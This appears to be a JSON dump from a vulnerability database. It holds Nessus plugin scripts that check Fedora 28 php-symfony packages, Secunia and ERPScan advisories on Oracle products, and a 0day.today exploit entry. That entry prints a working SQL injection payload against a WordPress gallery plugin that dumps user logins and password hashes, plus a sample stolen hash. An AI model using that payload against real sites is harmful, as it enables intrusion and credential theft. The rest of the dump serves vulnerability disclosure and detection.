(dmaicher)\n\n - bug #27143 [Console] By default hide the short exception\n trace line from exception messages in Symfony's commands\n (yceruto)\n\n - bug #27133 [Doctrine Bridge] fix priority for doctrine\n event listeners (dmaicher)\n\n - bug #27135 [FrameworkBundle] Use the correct service id\n for CachePoolPruneCommand in its compiler pass\n (DemonTPx)\n\n - feature #24896 Add CODE_OF_CONDUCT.md (egircys)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bodhi.fedoraproject.org/updates/FEDORA-2018-96d770ddc9\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected php-symfony4 package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:php-symfony4\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:28\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/06/13\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/06/06\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/01/03\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2019-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = pregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^28([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 28\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"FC28\", reference:\"php-symfony4-4.0.11-1.fc28\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"php-symfony4\");\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-07T10:21:00", "description": "**Version 3.4.11** (2018-05-25)\n\n - bug #27364 [DI] Fix bad exception on uninitialized\n references to non-shared services (nicolas-grekas)\n\n - bug #27359 [HttpFoundation] Fix perf issue during\n MimeTypeGuesser intialization (nicolas-grekas)\n\n - security #cve-2018-11408 [SecurityBundle] Fail if\n security.http_utils cannot be configured\n\n - security #cve-2018-11406 clear CSRF tokens when the user\n is logged out\n\n - security #cve-2018-11385 migrating session for\n UsernamePasswordJsonAuthenticationListener\n\n - security #cve-2018-11385 Adding session authentication\n strategy to Guard to avoid session fixation\n\n - security #cve-2018-11385 Adding session strategy to ALL\n listeners to avoid *any* possible fixation\n\n - security #cve-2018-11386 [HttpFoundation] Break infinite\n loop in PdoSessionHandler when MySQL is in loose mode\n\n - bug #27341 [WebProfilerBundle] Fixed validator/dump\n trace CSS (yceruto)\n\n - bug #27337 [FrameworkBundle] fix typo in\n CacheClearCommand (emilielorenzo)\n\n----\n\n**Version 3.4.10** (2018-05-21)\n\n - bug #27264 [Validator] Use strict type in URL validator\n (mimol91)\n\n - bug #27267 [DependencyInjection] resolve array env vars\n (jamesthomasonjr)\n\n - bug #26781 [Form] Fix precision of\n MoneyToLocalizedStringTransformer's divisions on\n transform() (syastrebov)\n\n - bug #27286 [Translation] Add Occitan plural rule\n (kylekatarnls)\n\n - bug #27271 [DI] Allow defining bindings on\n ChildDefinition (nicolas-grekas)\n\n - bug #27246 Disallow invalid characters in session.name\n (ostrolucky)\n\n - bug #27287 [PropertyInfo] fix resolving parent|self type\n hints (nicolas-grekas)\n\n - bug #27281 [HttpKernel] Fix dealing with self/parent in\n ArgumentMetadataFactory (fabpot)\n\n - bug #24805 [Security] Fix logout (MatTheCat)\n\n - bug #27265 [DI] Shared services should not be inlined in\n non-shared ones (nicolas-grekas)\n\n - bug #27141 [Process] Suppress warnings when open_basedir\n is non-empty (cbj4074)\n\n - bug #27250 [Session] limiting :key for GET_LOCK to 64\n chars (oleg-andreyev)\n\n - bug #27237 [Debug] Fix populating error_get_last() for\n handled silent errors (nicolas-grekas)\n\n - bug #27232 [Cache][Lock] Fix usages of error_get_last()\n (nicolas-grekas)\n\n - bug #27236 [Filesystem] Fix usages of error_get_last()\n (nicolas-grekas)\n\n - bug #27191 [DI] Display previous error messages when\n throwing unused bindings (nicolas-grekas)\n\n - bug #27231 [FrameworkBundle] Fix cache:clear on vagrant\n (nicolas-grekas)\n\n - bug #27222 [WebProfilerBundle][Cache] Fix misses\n calculation when calling getItems (fsevestre)\n\n - bug #27227 [HttpKernel] Handle NoConfigurationException\n 'onKernelException()' (nicolas-grekas)\n\n - bug #27152 [HttpFoundation] use brace-style regex\n delimiters (xabbuh)\n\n - bug #27158 [Cache] fix logic for fetching tag versions\n on TagAwareAdapter (dmaicher)\n\n - bug #27143 [Console] By default hide the short exception\n trace line from exception messages in Symfony's commands\n (yceruto)\n\n - bug #27133 [Doctrine Bridge] fix priority for doctrine\n event listeners (dmaicher)\n\n - bug #27135 [FrameworkBundle] Use the correct service id\n for CachePoolPruneCommand in its compiler pass\n (DemonTPx)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.", "edition": 12, "cvss3": {"score": 8.8, "vector": "AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2019-01-03T00:00:00", "title": "Fedora 28 : php-symfony3 (2018-ba0b683c10)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-11406", "CVE-2018-11386", "CVE-2018-11385", "CVE-2018-11408"], "modified": "2019-01-03T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:php-symfony3", "cpe:/o:fedoraproject:fedora:28"], "id": "FEDORA_2018-BA0B683C10.NASL", "href": "https://www.tenable.com/plugins/nessus/120738", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory FEDORA-2018-ba0b683c10.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(120738);\n script_version(\"1.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2018-11385\", \"CVE-2018-11386\", \"CVE-2018-11406\", \"CVE-2018-11408\");\n script_xref(name:\"FEDORA\", value:\"2018-ba0b683c10\");\n\n script_name(english:\"Fedora 28 : php-symfony3 (2018-ba0b683c10)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"**Version 3.4.11** (2018-05-25)\n\n - bug #27364 [DI] Fix bad exception on uninitialized\n references to non-shared services (nicolas-grekas)\n\n - bug #27359 [HttpFoundation] Fix perf issue during\n MimeTypeGuesser intialization (nicolas-grekas)\n\n - security #cve-2018-11408 [SecurityBundle] Fail if\n security.http_utils cannot be configured\n\n - security #cve-2018-11406 clear CSRF tokens when the user\n is logged out\n\n - security #cve-2018-11385 migrating session for\n UsernamePasswordJsonAuthenticationListener\n\n - security #cve-2018-11385 Adding session authentication\n strategy to Guard to avoid session fixation\n\n - security #cve-2018-11385 Adding session strategy to ALL\n listeners to avoid *any* possible fixation\n\n - security #cve-2018-11386 [HttpFoundation] Break infinite\n loop in PdoSessionHandler when MySQL is in loose mode\n\n - bug #27341 [WebProfilerBundle] Fixed validator/dump\n trace CSS (yceruto)\n\n - bug #27337 [FrameworkBundle] fix typo in\n CacheClearCommand (emilielorenzo)\n\n----\n\n**Version 3.4.10** (2018-05-21)\n\n - bug #27264 [Validator] Use strict type in URL validator\n (mimol91)\n\n - bug #27267 [DependencyInjection] resolve array env vars\n (jamesthomasonjr)\n\n - bug #26781 [Form] Fix precision of\n MoneyToLocalizedStringTransformer's divisions on\n transform() (syastrebov)\n\n - bug #27286 [Translation] Add Occitan plural rule\n (kylekatarnls)\n\n - bug #27271 [DI] Allow defining bindings on\n ChildDefinition (nicolas-grekas)\n\n - bug #27246 Disallow invalid characters in session.name\n (ostrolucky)\n\n - bug #27287 [PropertyInfo] fix resolving parent|self type\n hints (nicolas-grekas)\n\n - bug #27281 [HttpKernel] Fix dealing with self/parent in\n ArgumentMetadataFactory (fabpot)\n\n - bug #24805 [Security] Fix logout (MatTheCat)\n\n - bug #27265 [DI] Shared services should not be inlined in\n non-shared ones (nicolas-grekas)\n\n - bug #27141 [Process] Suppress warnings when open_basedir\n is non-empty (cbj4074)\n\n - bug #27250 [Session] limiting :key for GET_LOCK to 64\n chars (oleg-andreyev)\n\n - bug #27237 [Debug] Fix populating error_get_last() for\n handled silent errors (nicolas-grekas)\n\n - bug #27232 [Cache][Lock] Fix usages of error_get_last()\n (nicolas-grekas)\n\n - bug #27236 [Filesystem] Fix usages of error_get_last()\n (nicolas-grekas)\n\n - bug #27191 [DI] Display previous error messages when\n throwing unused bindings (nicolas-grekas)\n\n - bug #27231 [FrameworkBundle] Fix cache:clear on vagrant\n (nicolas-grekas)\n\n - bug #27222 [WebProfilerBundle][Cache] Fix misses\n calculation when calling getItems (fsevestre)\n\n - bug #27227 [HttpKernel] Handle NoConfigurationException\n 'onKernelException()' (nicolas-grekas)\n\n - bug #27152 [HttpFoundation] use brace-style regex\n delimiters (xabbuh)\n\n - bug #27158 [Cache] fix logic for fetching tag versions\n on TagAwareAdapter (dmaicher)\n\n - bug #27143 [Console] By default hide the short exception\n trace line from exception messages in Symfony's commands\n (yceruto)\n\n - bug #27133 [Doctrine Bridge] fix priority for doctrine\n event listeners (dmaicher)\n\n - bug #27135 [FrameworkBundle] Use the correct service id\n for CachePoolPruneCommand in its compiler pass\n (DemonTPx)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bodhi.fedoraproject.org/updates/FEDORA-2018-ba0b683c10\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected php-symfony3 package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:php-symfony3\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:28\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/06/13\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/06/05\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/01/03\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2019-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = pregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^28([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 28\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"FC28\", reference:\"php-symfony3-3.4.11-1.fc28\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"php-symfony3\");\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "zdt": [{"lastseen": "2018-04-11T19:49:03", "edition": 1, "description": "Exploit for php platform in category web applications", "published": "2017-03-09T00:00:00", "title": "WordPress Apptha Slider Gallery 1.0 Plugin - SQL Injection Vulnerability", "type": "zdt", "bulletinFamily": "exploit", "cvelist": [], "modified": "2017-03-09T00:00:00", "href": "https://0day.today/exploit/description/27271", "id": "1337DAY-ID-27271", "sourceData": "# # # # # \r\n# Exploit Title: WordPress Plugin Apptha Slider Gallery v1.0 - SQL Injection\r\n# Google Dork: N/A\r\n# Date: 09.03.2017\r\n# Vendor Homepage: https://www.apptha.com/\r\n# Software: https://www.apptha.com/category/extension/Wordpress/apptha-slider-gallery\r\n# Demo: http://www.apptha.com/demo/apptha-slider-gallery\r\n# Version: 1.0\r\n# Tested on: Win7 x64, Kali Linux x64\r\n# # # # # \r\n# Exploit Author: Ihsan Sencan\r\n# Author Web: http://ihsan.net\r\n# Author Mail : ihsan[@]ihsan[.]net\r\n# # # # #\r\n# SQL Injection/Exploit :\r\n# http://localhost/[PATH]/?albid=[SQL]\r\n# For example;\r\n# -3+/*!50000union*/+select+1,2,3,4,5,0x496873616e2053656e63616e20207777772e696873616e2e6e6574,concat(user_login,0x3a,user_pass),8,9,10,11,12,13,14+from+pleasant_users--+-&pid=6\r\n# admin:$P$BKL0XND.tfopqZH6S.QU.vhgjuVchx1\r\n# Etc..\r\n# # # # #\n\n# 0day.today [2018-04-11] #", "sourceHref": "https://0day.today/exploit/27271", "cvss": {"score": 0.0, "vector": "NONE"}}], "securityvulns": [{"lastseen": "2018-08-31T11:11:02", "bulletinFamily": "software", "cvelist": ["CVE-2015-4878", "CVE-2015-4877"], "description": "\r\n\r\n======================================================================\r\n\r\n Secunia Research (now part of Flexera Software) 26/10/2015\r\n\r\n Oracle Outside In Two Buffer Overflow Vulnerabilities\r\n\r\n======================================================================\r\nTable of Contents\r\n\r\nAffected Software....................................................1\r\nSeverity.............................................................2\r\nDescription of Vulnerabilities.......................................3\r\nSolution.............................................................4\r\nTime Table...........................................................5\r\nCredits..............................................................6\r\nReferences...........................................................7\r\nAbout Secunia........................................................8\r\nVerification.........................................................9\r\n\r\n======================================================================\r\n\r\n1) Affected Software\r\n\r\n* Oracle Outside In versions 8.5.0, 8.5.1, and 8.5.2.\r\n\r\n====================================================================== \r\n2) Severity\r\n\r\nRating: Moderately critical\r\nImpact: System Access\r\nWhere: From remote\r\n\r\n====================================================================== \r\n3) Description of Vulnerabilities\r\n\r\nSecunia Research has discovered two vulnerabilities in Oracle Outside\r\nIn Technology, which can be exploited by malicious people to cause a\r\nDoS (Denial of Service) and compromise an application using the SDK.\r\n\r\n1) An error in the vstga.dll when processing TGA files can be\r\nexploited to cause an out-of-bounds write memory access.\r\n\r\n2) An error in the libxwd2.dll when processing XWD files can be\r\nexploited to cause a stack-based buffer overflow.\r\n\r\nSuccessful exploitation of the vulnerabilities may allow execution of\r\narbitrary code.\r\n\r\n====================================================================== \r\n4) Solution\r\n\r\nApply update. Please see the Oracle Critical Patch Update Advisory\r\nfor October 2015 for details.\r\n\r\n====================================================================== \r\n5) Time Table\r\n\r\n14/07/2015 - Vendor notified of vulnerabilities.\r\n14/07/2015 - Vendor acknowledges report.\r\n16/07/2015 - Vendor supplied bug ticket ID.\r\n27/07/2015 - Vendor supplied information of fix in main codeline.\r\n24/09/2015 - Replied to vendor and asked about CVE references.\r\n25/09/2015 - Vendor replied that they check our request.\r\n27/09/2015 - Vendor assigned two CVE references.\r\n17/10/2015 - Vendor supplied 20/10/2015 as estimated fix date.\r\n20/10/2015 - Release of vendor patch.\r\n21/10/2015 - Public disclosure.\r\n26/10/2015 - Publication of research advisory.\r\n\r\n======================================================================\r\n\r\n6) Credits\r\n\r\nDiscovered by Behzad Najjarpour Jabbari, Secunia Research (now part\r\nof Flexera Software).\r\n\r\n======================================================================\r\n\r\n7) References\r\n\r\nThe Common Vulnerabilities and Exposures (CVE) project has assigned\r\nthe CVE-2015-4877 and CVE-2015-4878 identifiers for the\r\nvulnerabilities.\r\n\r\n======================================================================\r\n\r\n8) About Secunia (now part of Flexera Software)\r\n\r\nIn September 2015, Secunia has been acquired by Flexera Software:\r\n\r\nhttps://secunia.com/blog/435/\r\n\r\nSecunia offers vulnerability management solutions to corporate\r\ncustomers with verified and reliable vulnerability intelligence\r\nrelevant to their specific system configuration:\r\n\r\nhttp://secunia.com/advisories/business_solutions/\r\n\r\nSecunia also provides a publicly accessible and comprehensive advisory\r\ndatabase as a service to the security community and private\r\nindividuals, who are interested in or concerned about IT-security.\r\n\r\nhttp://secunia.com/advisories/\r\n\r\nSecunia believes that it is important to support the community and to\r\ndo active vulnerability research in order to aid improving the\r\nsecurity and reliability of software in general:\r\n\r\nhttp://secunia.com/secunia_research/\r\n\r\nSecunia regularly hires new skilled team members. Check the URL below\r\nto see currently vacant positions:\r\n\r\nhttp://secunia.com/corporate/jobs/\r\n\r\nSecunia offers a FREE mailing list called Secunia Security Advisories:\r\n\r\nhttp://secunia.com/advisories/mailing_lists/\r\n\r\n======================================================================\r\n\r\n9) Verification \r\n\r\nPlease verify this advisory by visiting the Secunia website:\r\nhttp://secunia.com/secunia_research/2015-04/\r\n\r\nComplete list of vulnerability reports published by Secunia Research:\r\nhttp://secunia.com/secunia_research/\r\n\r\n======================================================================\r\n\r\n", "edition": 1, "modified": "2015-11-02T00:00:00", "published": "2015-11-02T00:00:00", "id": "SECURITYVULNS:DOC:32659", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:32659", "title": "Secunia Research: Oracle Outside In Two Buffer Overflow Vulnerabilities", "type": "securityvulns", "cvss": {"score": 1.5, "vector": "AV:LOCAL/AC:MEDIUM/Au:SINGLE_INSTANCE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2018-08-31T11:11:02", "bulletinFamily": "software", "cvelist": ["CVE-2015-4845"], "description": "\r\n\r\n1. ADVISORY INFORMATION\r\n\r\nTitle: Oracle E-Business Suite - Database user enumeration\r\nAdvisory ID: [ERPSCAN-15-025]\r\nAdvisory URL: http://erpscan.com/advisories/erpscan-15-025-oracle-e-business-suite-database-user-enumeration-vulnerability/\r\nDate published:20.10.2015\r\nVendors contacted: Oracle\r\n\r\n2. VULNERABILITY INFORMATION\r\n\r\nClass: User Enumeration\r\nImpact: user enumeration, SSRF\r\nRemotely Exploitable: Yes\r\nLocally Exploitable: No\r\nCVE Name: CVE-2015-4845\r\nCVSS Information\r\nCVSS Base Score: 4.3 / 10\r\nAV : Access Vector (Related exploit range) Network (N)\r\nAC : Access Complexity (Required attack complexity) Medium (M)\r\nAu : Authentication (Level of authentication needed to exploit) None (N)\r\nC : Impact to Confidentiality Partial (P)\r\nI : Impact to Integrity None (N)\r\nA : Impact to Availability None (N)\r\n\r\n3. VULNERABILITY DESCRIPTION\r\n\r\nThere is a script in EBS that is used to connect to the database and\r\ndisplays the connection status. Different connection results can help\r\nan attacker to find existing database accounts.\r\n\r\n4. VULNERABLE PACKAGES\r\n\r\nOracle E-Business Suite 12.2.4\r\nOther versions are probably affected too, but they were not checked.\r\n\r\n5. SOLUTIONS AND WORKAROUNDS\r\n\r\nInstall Oracle CPU October 2015\r\n\r\n6. AUTHOR\r\nNikita Kelesis, Ivan Chalykin, Alexey Tyurin, Egor Karbutov (ERPScan)\r\n\r\n7. TECHNICAL DESCRIPTION\r\n\r\nDatabase users enumeration\r\nVunerable script: Aoljtest.js\r\n\r\n\r\n8. REPORT TIMELINE\r\n\r\nReported: 17.07.2015\r\nVendor response: 24.07.2015\r\nDate of Public Advisory: 20.10.2015\r\n\r\n9. REFERENCES\r\nhttp://www.oracle.com/technetwork/topics/security/cpuoct2015-2367953.html\r\nhttp://erpscan.com/advisories/erpscan-15-025-oracle-e-business-suite-database-user-enumeration-vulnerability/\r\nhttp://erpscan.com/press-center/press-release/erpscan-took-a-closer-look-at-oracle-ebs-security-6-vulnerabilities-patched-in-recent-update/\r\n\r\n10. ABOUT ERPScan Research\r\nThe company\u2019s expertise is based on the research subdivision of\r\nERPScan, which is engaged in vulnerability research and analysis of\r\ncritical enterprise applications. It has achieved multiple\r\nacknowledgments from the largest software vendors like SAP, Oracle,\r\nMicrosoft, IBM, VMware, HP for discovering more than 400\r\nvulnerabilities in their solutions (200 of them just in SAP!).\r\nERPScan researchers are proud to have exposed new types of\r\nvulnerabilities (TOP 10 Web Hacking Techniques 2012) and to be\r\nnominated for the best server-side vulnerability at BlackHat 2013.\r\nERPScan experts have been invited to speak, present, and train at 60+\r\nprime international security conferences in 25+ countries across the\r\ncontinents. These include BlackHat, RSA, HITB, and private SAP\r\ntrainings in several Fortune 2000 companies.\r\nERPScan researchers lead the project EAS-SEC, which is focused on\r\nenterprise application security research and awareness. They have\r\npublished 3 exhaustive annual award-winning surveys about SAP\r\nsecurity.\r\nERPScan experts have been interviewed by leading media resources and\r\nfeatured in specialized info-sec publications worldwide. These include\r\nReuters, Yahoo, SC Magazine, The Register, CIO, PC World, DarkReading,\r\nHeise, and Chinabyte, to name a few.\r\nWe have highly qualified experts in staff with experience in many\r\ndifferent fields of security, from web applications and\r\nmobile/embedded to reverse engineering and ICS/SCADA systems,\r\naccumulating their experience to conduct the best SAP security\r\nresearch.\r\n\r\n\r\n11. ABOUT ERPScan\r\nERPScan is one of the most respected and credible Business Application\r\nSecurity providers. Founded in 2010, the company operates globally.\r\nNamed an Emerging vendor in Security by CRN and distinguished by more\r\nthan 25 other awards, ERPScan is the leading SAP SE partner in\r\ndiscovering and resolving security vulnerabilities. ERPScan\r\nconsultants work with SAP SE in Walldorf to improve the security of\r\ntheir latest solutions.\r\nERPScan\u2019s primary mission is to close the gap between technical and\r\nbusiness security. We provide solutions to secure ERP systems and\r\nbusiness-critical applications from both cyber attacks and internal\r\nfraud. Our clients are usually large enterprises, Fortune 2000\r\ncompanies, and managed service providers whose requirements are to\r\nactively monitor and manage the security of vast SAP landscapes on a\r\nglobal scale.\r\nOur flagship product is ERPScan Security Monitoring Suite for SAP.\r\nThis multi award-winning innovative software is the only solution on\r\nthe market certified by SAP SE covering all tiers of SAP security:\r\nvulnerability assessment, source code review, and Segregation of\r\nDuties.\r\nThe largest companies from diverse industries like oil and gas,\r\nbanking, retail, even nuclear power installations as well as\r\nconsulting companies have successfully deployed the software. ERPScan\r\nSecurity Monitoring Suite for SAP is specifically designed for\r\nenterprises to continuously monitor changes in multiple SAP systems.\r\nIt generates and analyzes trends in user friendly dashboards, manages\r\nrisks, tasks, and can export results to external systems. These\r\nfeatures enable central management of SAP system security with minimal\r\ntime and effort.\r\nWe follow the sun and function in two hubs located in the Netherlands\r\nand the US to operate local offices and partner network spanning 20+\r\ncountries around the globe. This enables monitoring cyber threats in\r\nreal time and providing agile customer support.\r\n\r\nAdress USA: 228 Hamilton Avenue, Fl. 3, Palo Alto, CA. 94301\r\nPhone: 650.798.5255\r\nTwitter: @erpscan\r\nScoop-it: Business Application Security\r\n\r\n", "edition": 1, "modified": "2015-11-02T00:00:00", "published": "2015-11-02T00:00:00", "id": "SECURITYVULNS:DOC:32656", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:32656", "title": "[ERPSCAN-15-025] Oracle E-Business Suite Database user enumeration Vulnerability", "type": "securityvulns", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2018-08-31T11:10:02", "bulletinFamily": "software", "cvelist": ["CVE-2015-1338"], "description": "Symbolic links and hadlinks vulnerability in log files, privilege escalation.", "edition": 1, "modified": "2015-11-02T00:00:00", "published": "2015-11-02T00:00:00", "id": "SECURITYVULNS:VULN:14720", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:14720", "title": "apport security vulnerabilities", "type": "securityvulns", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:11:02", "bulletinFamily": "software", "cvelist": ["CVE-2015-4886"], "description": "\r\n\r\n1. ADVISORY INFORMATION\r\n\r\nTitle: Oracle E-Business Suite XXE injection\r\nAdvisory ID: [ERPSCAN-15-028]\r\nAdvisory URL: http://erpscan.com/advisories/erpscan-15-028-oracle-e-business-suite-xxe-injection-vulnerability/\r\nDate published: 20.10.2015\r\nVendors contacted: Oracle\r\n\r\n2. VULNERABILITY INFORMATION\r\n\r\nClass: XML External Entity [CWE-611]\r\nImpact: information disclosure, DoS, SSRF, NTLM relay\r\nRemotely Exploitable: Yes\r\nLocally Exploitable: No\r\nCVE Name: CVE-2015-4886\r\nCVSS Information\r\nCVSS Base Score: 6.4 / 10\r\nAV : Access Vector (Related exploit range) Network (N)\r\nAC : Access Complexity (Required attack complexity) Low (L)\r\nAu : Authentication (Level of authentication needed to exploit) None (N)\r\nC : Impact to Confidentiality Partial (P)\r\nI : Impact to Integrity Partial (P)\r\nA : Impact to Availability None (N)\r\n\r\n3. VULNERABILITY DESCRIPTION\r\n\r\n1) An attacker can read an arbitrary file on a server by sending a\r\ncorrect XML request with a crafted DTD and reading the response from\r\nthe service.\r\n2) An attacker can perform a DoS attack (for example, XML Entity Expansion).\r\n3) An SMB Relay attack is a type of Man-in-the-Middle attack where the\r\nattacker asks the victim to authenticate into a machine controlled by\r\nthe attacker, then relays the credentials to the target. The attacker\r\nforwards the authentication information both ways and gets access.\r\n\r\n4. VULNERABLE PACKAGES\r\n\r\nOracle E-Business Suite 12.1.3\r\n\r\nOther versions are probably affected too, but they were not checked.\r\n\r\n5. SOLUTIONS AND WORKAROUNDS\r\n\r\nInstall Oracle CPU October 2015\r\n\r\n6. AUTHOR\r\nNikita Kelesis, Ivan Chalykin, Alexey Tyurin (ERPScan)\r\n\r\n7. TECHNICAL DESCRIPTION\r\n\r\nVulnerable servlet:\r\n/OA_HTML/copxml\r\n\r\n8. REPORT TIMELINE\r\n\r\nReported: 17.07.2015\r\nVendor response: 24.07.2015\r\nDate of Public Advisory: 20.10.2015\r\n\r\n9. REFERENCES\r\n\r\nhttp://www.oracle.com/technetwork/topics/security/cpuoct2015-2367953.html\r\nhttp://erpscan.com/advisories/erpscan-15-028-oracle-e-business-suite-xxe-injection-vulnerability/\r\n\r\n\r\n10. ABOUT ERPScan Research\r\nThe company\u2019s expertise is based on the research subdivision of\r\nERPScan, which is engaged in vulnerability research and analysis of\r\ncritical enterprise applications. It has achieved multiple\r\nacknowledgments from the largest 